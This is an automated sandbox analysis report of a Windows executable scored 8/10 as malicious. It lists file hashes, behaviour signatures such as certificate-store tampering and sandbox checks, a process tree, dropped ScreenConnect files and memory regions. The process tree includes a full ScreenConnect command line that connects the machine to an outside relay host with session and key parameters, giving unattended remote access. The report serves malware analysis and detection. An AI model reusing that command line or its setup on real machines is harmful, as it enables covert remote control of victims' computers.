Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/05/2024, 07:21

General

  • Target

    24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe

  • Size

    84KB

  • MD5

    24b92de6f1fa78d17586cc33516d2760

  • SHA1

    aafb98e8a2ce2d1bbb64dc5ec18769016f39cf70

  • SHA256

    6b8b35c3f734f80a1fff238d7d02f72362d2c5c53d077d09b4a72a0ce7fe0979

  • SHA512

    1cf1de5444e22969fb0507056bec084a86f6fe3e5c5d603998802c3d9bfa31bb380dafcf6cd642efac3ba8915f4befeea391248188bf7ae2644b2602c1ad1ad7

  • SSDEEP

    1536:0azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYm78Exj:AFNpo6rIKlUE8fbkqRfbaQlaYYmB

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Manipulates Digital Signatures 1 TTPs 4 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 16 IoCs
  • Drops file in System32 directory 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe"
    1⤵
    • Manipulates Digital Signatures
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.WindowsClient.exe"
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.ClientService.exe
          "C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-yp0dwd-relay.screenconnect.com&p=443&s=02246d46-0755-460e-985e-726dc761d255&k=BgIAAACkAABSU0ExAAgAAAEAAQC5GvbvcZAxIpD9TgcZwBfMfBxwQcJXJq7riox3Anold6J1P35iiqPjMDsbijlKCx5INOyiK6NmNmeSgaSzG320lHwXxuq4DjEotVaevAfY974RZb3WSLkwhwCp1ajm48bYTByPIdNvzESe7rTNSjg%2b8BoPZ2zwKtQwvzoRoTxfMKJjijYmvqFM3XGJ5%2bxQOOBkAuUqyhoIkesPDtUJBNTeLdnzm3UL3da6dDMfOwQzybXA9s5MMf8x5NEUK6xoggkgFEjWieQ%2fk4WYeDYwwIhCDPfcRt3rQt4bckvMp%2fjVdkp%2fNQEfihtgRR%2bEKR8QevihYFK%2bLKxeMmmZc6TjKPDa&r=%2f&i=Untitled%20Session" "1"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3052
  • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.ClientService.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-yp0dwd-relay.screenconnect.com&p=443&s=02246d46-0755-460e-985e-726dc761d255&k=BgIAAACkAABSU0ExAAgAAAEAAQC5GvbvcZAxIpD9TgcZwBfMfBxwQcJXJq7riox3Anold6J1P35iiqPjMDsbijlKCx5INOyiK6NmNmeSgaSzG320lHwXxuq4DjEotVaevAfY974RZb3WSLkwhwCp1ajm48bYTByPIdNvzESe7rTNSjg%2b8BoPZ2zwKtQwvzoRoTxfMKJjijYmvqFM3XGJ5%2bxQOOBkAuUqyhoIkesPDtUJBNTeLdnzm3UL3da6dDMfOwQzybXA9s5MMf8x5NEUK6xoggkgFEjWieQ%2fk4WYeDYwwIhCDPfcRt3rQt4bckvMp%2fjVdkp%2fNQEfihtgRR%2bEKR8QevihYFK%2bLKxeMmmZc6TjKPDa&r=%2f&i=Untitled%20Session" "1"
    1⤵
    • Sets service image path in registry
    • Executes dropped EXE
    • Loads dropped DLL
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4288
    • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.WindowsClient.exe" "RunRole" "ec62af56-ddcf-4020-aab8-998d45db5a26" "User"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1028
    • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\ScreenConnect.WindowsClient.exe" "RunRole" "bc8e423e-13c2-4050-bd6e-016822870506" "System"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:1732

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b.cdf-ms

          Filesize

          24KB

          MD5

          850dadb2b2f118970c521db58b9ea6b6

          SHA1

          ba49cb75741a04daed80d0973b4906970eed2040

          SHA256

          58af9cc15dd1bbf98883d7adf2ef4ce2c371d7326852f20c6b41110e9b0ee352

          SHA512

          492eab1d5da721074a1b6d04bb313b05422f9e22b0fde29314185354dbde9c7d802ab3ec7efb7765cfedbc345e286edb7027954a80e4fd94306b1bce82d4984e

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df.cdf-ms

          Filesize

          3KB

          MD5

          32ec9cbc6733b758b606f56067910e58

          SHA1

          d21a57be9b9345f20ac9d7e52005c2a61898a6fb

          SHA256

          abe80d5a9e4961ef8cf8f23c53118efc82e3b218e6640c44dbb507ec781bba5f

          SHA512

          5afa66db7a92b6b5dce286c3ccc78b54b9a87d36740c3cc22ca6cd94ed1626c5b618743eb01dde5854fb005978deb9b73570ab8aa82cc4c2383c9260935afb7d

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre..dows_4b14c015c87c1ad8_0018.0001_none_57acd8973addaa0f.cdf-ms

          Filesize

          5KB

          MD5

          a7102740ad2e94869eb2ff3dc6863a4f

          SHA1

          efd4b9d9087169a2ecd13cfa971eb941e2515056

          SHA256

          a12f8374cbe38dcfe4c981962baa4b2a25ed884abfdca16c02a55f9bd718531a

          SHA512

          8ba11c6a00ef57deaa6f62883b9f1e18db2d89559fc01ee3b03f050e4dc98c1a8c29a909d3f703c2432068c283af4f4bf9281f977c0ba3241479a94dbd33513a

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e77379ec.cdf-ms

          Filesize

          6KB

          MD5

          15e21486089788dcb203bd9561a3046a

          SHA1

          9be0d817245dab43e5d002ec9e7c0f029cf3a0f1

          SHA256

          5ff593ab787ca10c56871a86350984f7d33a35a01c7445f2d0544738c07084a0

          SHA512

          54e043712acdc1cc3c5488b6e2312dfdf0c05d7531a3b3f7822f1c3d85c35f1f499b82bb1f4f0630e0b30b7ed3a41fdf4c1b357eba33f8d5e6a0256302f90413

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre..ient_4b14c015c87c1ad8_0018.0001_none_e94a5e880ddeece3.cdf-ms

          Filesize

          2KB

          MD5

          e85a4ec07341b3b551fc4b06a7f99b54

          SHA1

          759b558252a4a9569f6da6c90be47b8fe07ac2d0

          SHA256

          558a6cb2277b0e83acc0d33981e6a140ec77cad3d54a1d313f7dad6258ba2e35

          SHA512

          01c051b1b74b245d08da391ee8644c8a4ffff5257494af93a0785b82655983878103a8a9404bfc83322087bb04b21b347666bf7c27e862237b73df0e9bb5371a

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e.cdf-ms

          Filesize

          14KB

          MD5

          b547d62db14a04c7fcf7bac261b45c7d

          SHA1

          6c2db747e789f274e11b8a30fbfc2700276bb63e

          SHA256

          d879af4091c1bdb6a61fc5bdfdbe74df4e2fa6ef090e6ee09849ddee645d08a4

          SHA512

          63354b6bd930cf4f2cc9ab8389c413e87bf4ebe0d1ba3bb8254215b185142258a73d2ef207206399d12308598d6062c9d6c668bdb5f31a29452870f6627cfb77

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\manifests\scre..vice_4b14c015c87c1ad8_0018.0001_none_048898fe944efa4a.cdf-ms

          Filesize

          4KB

          MD5

          21720b1e045b8d397904dbb626f7ca8c

          SHA1

          3439c240b357be953745de6473523e7da2c57670

          SHA256

          3cc712a1299dc767b72a92fa7c1657f5c644987bc53f3d196dae3645f3c39179

          SHA512

          8a355907b42e519298ed385efade5c81f199fb070f0415cc3bf74a276f1e89db4c07dbc68d4175eb179e6c5d71c25e1cf95091f43720d5d8fb9a6bd40307f9fe

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b\ScreenConnect.ClientService.exe

          Filesize

          93KB

          MD5

          1b8110b335e144860e91f5e68ccdc8b3

          SHA1

          4f1662c9f914776e22616d2619d6cd99dc4333a7

          SHA256

          dc326e95e7f778aa53f67b420c3f7621ed078ee33ef9beb62d4907e90f55a389

          SHA512

          dbd21613450f61be471bd4406847773cd96b3355b70bcb1ca74043d0ff102c0e782abd185f9dbcfb6a07fb71f490f3d500aea32056f2978cfbb106f4badb373a

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\Client.Override.en-US.resources

          Filesize

          600B

          MD5

          78d3bc36460de8d2ad092cc76667b398

          SHA1

          3415d5f7f65f113ecb6a3fc482155c339009008b

          SHA256

          ee5ebd66d501c79df24da53e18a39b30b0fb0c114a4d89ce3eebad14cd8485cd

          SHA512

          caa93e75d3715f25c9d94089f88684abb05bb2f57503a022cb95893bfad19ce578ef46f8b72ef7347da3e3e0c4889da504763f1fc7f166195d1a77d5d03c76aa

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\Client.de-DE.resources

          Filesize

          45KB

          MD5

          1503a8721469dcd677e64de935c7c320

          SHA1

          c618d6a9a4c01d8b88b323b4ca776838258de88d

          SHA256

          9194a594d9d79773e10d5ee9a2d685914d7e02935b3c676b40a1fa97135a67d7

          SHA512

          68e22b682c0b507107c9709b93bded22440f01f5820c0a50c85885c2cd56298c37ccda83f78a43ff3098926349b7ef479c5087a628b3579985ef4e759dd26109

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\Client.en-US.resources

          Filesize

          48KB

          MD5

          511202ed0ba32d7f09eab394c917d067

          SHA1

          dbd611720fd1730198f72dec09e8e23e6d6488f8

          SHA256

          f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d

          SHA512

          f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\Client.resources

          Filesize

          26KB

          MD5

          5cd580b22da0c33ec6730b10a6c74932

          SHA1

          0b6bded7936178d80841b289769c6ff0c8eead2d

          SHA256

          de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

          SHA512

          c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

        • C:\Users\Admin\AppData\Local\Apps\2.0\H3R4XA9R.MY5\MMLQA5HQ.TMM\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\user.config

          Filesize

          586B

          MD5

          cc990f3c07b9ef98cd7b584ffd77f075

          SHA1

          a3d519cb8edc44720011158c8baeb3905c6ba415

          SHA256

          7c7a1c757f93f6136923fbb135b19ca9ad3f8acfdd4b9ec13b16a26e292dc367

          SHA512

          48c0ac7e4c910bf98df798f1028f8d02052a64c390320786548ad281d471c2b43d1f64c991405e95f7962ddc3caef80f98820dbb20f583cc01ecdf2477d84331

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

          Filesize

          1KB

          MD5

          efd934620fb989581d19963e3fbb6d58

          SHA1

          63b103bb53e254a999eb842ef90462f208e20162

          SHA256

          3af88293fb19b74f43b351ed49ccc031727f389c7ca509eece181da5763a492f

          SHA512

          6061817547280c5cf5d2cd50fa76b92aa9c1cfc433f17d6b545192e1098281394562adb773931cecd15d1b594d3b9c03855b70682fe6c54df5912c185b54670b

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.Client.dll

          Filesize

          192KB

          MD5

          bddfba6105b88f0df924d41e20a43efb

          SHA1

          73a0ffb39b4193eb9db8b705b552019e91461d15

          SHA256

          a0faff6017e061386a7a161f6d97cca3e935ecf1733d2cb999d1400e60e5eaf2

          SHA512

          4493de052e1daeccf8ec4661ccfc5c369014121eb730fb8aa4cec789c5bb65b1ae74bb4928f6ea4fcc9d3359c52584b8e9c0fcd90994af493a2a48ebf5bb71fe

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.Client.dll.genman

          Filesize

          1KB

          MD5

          24af083471952e5073014b7269b94d1d

          SHA1

          3aa11476b34b771738dbd42f61fbd3fe16139064

          SHA256

          6fdb3834f278d039f8f36f875c1a842be8143df0547e9db04aaf54b655dc2b3d

          SHA512

          c2a6ff6ba4c67a6f676e1be4a639aa07f43d7848faf0d24c04a4097d14c9bf371b15fe5e60b7e9fb747dd07ff2637a303c52a59ba9885317ceb66a97b2e56732

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.ClientService.dll

          Filesize

          66KB

          MD5

          d8ec66efb7ce863d68931685039c9775

          SHA1

          852c5332e22cfd720a0ea42cf69e602d397fa6a7

          SHA256

          de8d8e97fb59c4f8e5cd936e566ec9d9423d270556ce5f005bfff89ae2f45a45

          SHA512

          d1f2c8dee56f26f6a2e7ad1075cd5e23a3e6a048a4b420fc9ffe06829dee3bc677cf11098dbf1f1124b4413816728245095da68ea63bf8909ca0c0b5c3aa94c0

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.ClientService.dll.genman

          Filesize

          1KB

          MD5

          7d3bb8d33e0013b9bc19259d35631000

          SHA1

          a274018bef6f3bff0cae63d0706cbe94d5005362

          SHA256

          3e9c02c807ac20bd6c80a586bdc4c61beb69f5d8576d7a1a34db9681ccd92756

          SHA512

          d77a68be6fe5755e4091694902a431f008241b4ac0ba0550e3e781bebc1dc221a1ea507c363ec3d2edddd4631a18a82b0be4ab10ddc5979677c85b725fbe7718

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.Core.dll

          Filesize

          533KB

          MD5

          5c259da933c9261944afb6aa9a7e858b

          SHA1

          cad0ecb9ac68694cc601a7c980f985d9c29afa88

          SHA256

          0d04ef4b196e5ce3412e58474ff5303ccbdc0a2f32487946b382b0b672615833

          SHA512

          f7e6c778943771fa1830805021dc7e64e47a30895ab9d5bf3708d82abd2bfccaba58ca86cfed8d38c879df9e41999054838abd6b55e7dd400daec84480dc5041

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.Core.dll.genman

          Filesize

          1KB

          MD5

          9e3fd8a2790f7d451f4d9b853edb19cb

          SHA1

          c4f26162b4666cf98da7467f819140d6063565e2

          SHA256

          6244a07cf52244e257ac5e2ca1eb619ce9434b3ed0aef6c93c9cfb258aed7aeb

          SHA512

          64a9a9fa4b45eba7334444d87aa8b4a808ff5bbd3bc71cb205193bc9de2b623d15e5ff6e3ce9d2acf445aca738749398a1c5249aff09af8eaeed6f465389010c

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.Windows.dll

          Filesize

          1.6MB

          MD5

          ab11c92301bd6b916f51eb3c6ba1f348

          SHA1

          edbcea68f4d7b06aef28a9e631fa0a5cfbb7889f

          SHA256

          ea86c15300b8cc311de257456ea8b281ab7b5f231a4fcbcff07e6f300e9ade14

          SHA512

          9a42a8f6a71f55e8f85ff97593ffa2d3935ff80142ce6a57a9a104ee6d97043cf20c29f386007929da31496e270ea9d5c0c7766d687d36d0e5523391e1b68e17

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.Windows.dll.genman

          Filesize

          1KB

          MD5

          4ac5d03b56acf6ec0969d4017745df3a

          SHA1

          585fb53cb3b99848572813a5dfe13f9f9a56866b

          SHA256

          a4d063c3ba3b9d1572db0193c55eb23c2c4d500987d600a7641b82076f1a5e8f

          SHA512

          ed5ef6055a4efee57eb43306e1929f55eeeb2afb8ea12d69bf1f575b0626f46e0eeec8a16c48249639aca5d2a6c0b8d1421b543888f09953d12b0c1b46baf85e

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.WindowsBackstageShell.exe

          Filesize

          59KB

          MD5

          993c201d63c86c889385d0f50560ed77

          SHA1

          e032e82c325bc00b4ba03e27c872307c41575a2e

          SHA256

          7596c3b6dfdc06320d31d2f7622766e66f3845bf11c75acb3e356db9cd530af9

          SHA512

          798d94954d3e3796d860015ca99e5435259bb0ffa1e63c8ce00129a7ab9be78e40b171b718d34345dbaf4743a576530f4db159cf74cb832cccca834395d2c787

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.WindowsClient.exe

          Filesize

          584KB

          MD5

          dbd7c0d2cf1bf5cec608648f14dc8309

          SHA1

          5241f5bec67a5e6ec2ee009c4f2e0f6f049841cb

          SHA256

          1145fac110c18d2cd228a545ec4fcb7d3aedd3c072b19c559d6e7067f7cf3f5f

          SHA512

          cc14bd533c63791f885dec7aeb75d4e0bc5b51299e8f09f98ccb2a03ee7877daa42768585e0b824a842a2df8e09f86ac483f970c17d6ae2d4bb4a28670a7c99d

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.WindowsClient.exe.config

          Filesize

          266B

          MD5

          728175e20ffbceb46760bb5e1112f38b

          SHA1

          2421add1f3c9c5ed9c80b339881d08ab10b340e3

          SHA256

          87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

          SHA512

          fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.WindowsClient.exe.genman

          Filesize

          2KB

          MD5

          f9b14df497b4c59141dd68827e7d6c2e

          SHA1

          eb415a7b5a7784694458b4d8ba6cb30bf38c81fe

          SHA256

          0cad8868b6947f86137e592308ec8ba46e318898dc338557b4fdce0d056a5d9c

          SHA512

          5e0f9f2d89dca27b9f89cc25c040b7c8e5f5a27230c1e1ea91ffd6e1b51ebd0c3e739c2f917fbcc63e125cf819e71fdf3dd27b47b03ec51a6d34cc7aa6f14ff2

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.WindowsClient.exe.manifest

          Filesize

          17KB

          MD5

          f07208902a10a9cddf338f6256fe6b11

          SHA1

          fc7e577dec034b680a80b51a6d188af3b429e2f4

          SHA256

          add65d10a544d74ce772d5130ea11c1827b8521ea7b06b1fae7251bd852c46e4

          SHA512

          a9dee634eb94d01cc25ffe6e793e41cd7b49814b3a4ba4515719bad15602bfe34be2a7029accaee123330d34ce39736fae4f4f80bcd3f3fae822653419733435

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DCHNHH85.AWN\LLQ5KMTE.NET\ScreenConnect.WindowsFileManager.exe

          Filesize

          79KB

          MD5

          d7ac4220c10c1474730546d15edd1810

          SHA1

          bb87e80b2132e0ce8591f772091e79ec640e8d16

          SHA256

          24138fe20aa06390f09fd8bd6ed78e35f6c33d60c0ccf66759100986c1607be6

          SHA512

          dd5112b9bf4845d42e2d7f06dc7a053b3b78d7a2ae498a7c2da445df23e4d854a12bf4d6c215fab885307477c0a431d6b1bfc54c01bb368f81229fee56bb9e70

        • C:\Users\Admin\AppData\Local\Temp\Deployment\DMK99NXW.66O\D3KDRE1N.7BR.application

          Filesize

          172KB

          MD5

          468ab57c230dd89670557f5c0827b92a

          SHA1

          178e0dfe028e66868caa987e6bf7eb860920eb0a

          SHA256

          548b30d20d4c258d3362fe2a11fade709bb33d4afcfe83df026be9158ac5dd29

          SHA512

          1ba0e56fac6d56bc20dc27fe89d7f120d3d7ca9fd49fbf055bcf33baf118ef047cbeac865d679d9ed21fb82a4ad466e77abc17be2cfa135f17dc2b9bde0069b6

        • memory/832-345-0x0000000000690000-0x0000000000726000-memory.dmp

          Filesize

          600KB

        • memory/1028-405-0x0000000000B20000-0x0000000000B38000-memory.dmp

          Filesize

          96KB

        • memory/3052-378-0x0000000005930000-0x00000000059BC000-memory.dmp

          Filesize

          560KB

        • memory/3052-373-0x0000000005830000-0x0000000005848000-memory.dmp

          Filesize

          96KB

        • memory/3272-49-0x000001DD38D70000-0x000001DD38DA6000-memory.dmp

          Filesize

          216KB

        • memory/3272-413-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

          Filesize

          10.8MB

        • memory/3272-55-0x000001DD38C70000-0x000001DD38C88000-memory.dmp

          Filesize

          96KB

        • memory/3272-0-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

          Filesize

          8KB

        • memory/3272-43-0x000001DD38E00000-0x000001DD38E8C000-memory.dmp

          Filesize

          560KB

        • memory/3272-61-0x000001DD38E10000-0x000001DD38EA6000-memory.dmp

          Filesize

          600KB

        • memory/3272-414-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

          Filesize

          10.8MB

        • memory/3272-1-0x000001DD1D890000-0x000001DD1D898000-memory.dmp

          Filesize

          32KB

        • memory/3272-412-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

          Filesize

          8KB

        • memory/3272-2-0x000001DD37E60000-0x000001DD37FE6000-memory.dmp

          Filesize

          1.5MB

        • memory/3272-37-0x000001DD3B6F0000-0x000001DD3B89A000-memory.dmp

          Filesize

          1.7MB

        • memory/3272-29-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

          Filesize

          10.8MB

        • memory/3272-7-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

          Filesize

          10.8MB

        • memory/3272-6-0x000001DD3AF70000-0x000001DD3AFC0000-memory.dmp

          Filesize

          320KB

        • memory/3272-3-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

          Filesize

          10.8MB

        • memory/4288-389-0x0000000004090000-0x000000000423A000-memory.dmp

          Filesize

          1.7MB

        • memory/4288-396-0x0000000004240000-0x00000000042D2000-memory.dmp

          Filesize

          584KB

        • memory/4288-395-0x0000000003F80000-0x0000000003FB6000-memory.dmp

          Filesize

          216KB

        • memory/4288-392-0x0000000003F30000-0x0000000003F80000-memory.dmp

          Filesize

          320KB

        • memory/4288-390-0x00000000047F0000-0x0000000004D94000-memory.dmp

          Filesize

          5.6MB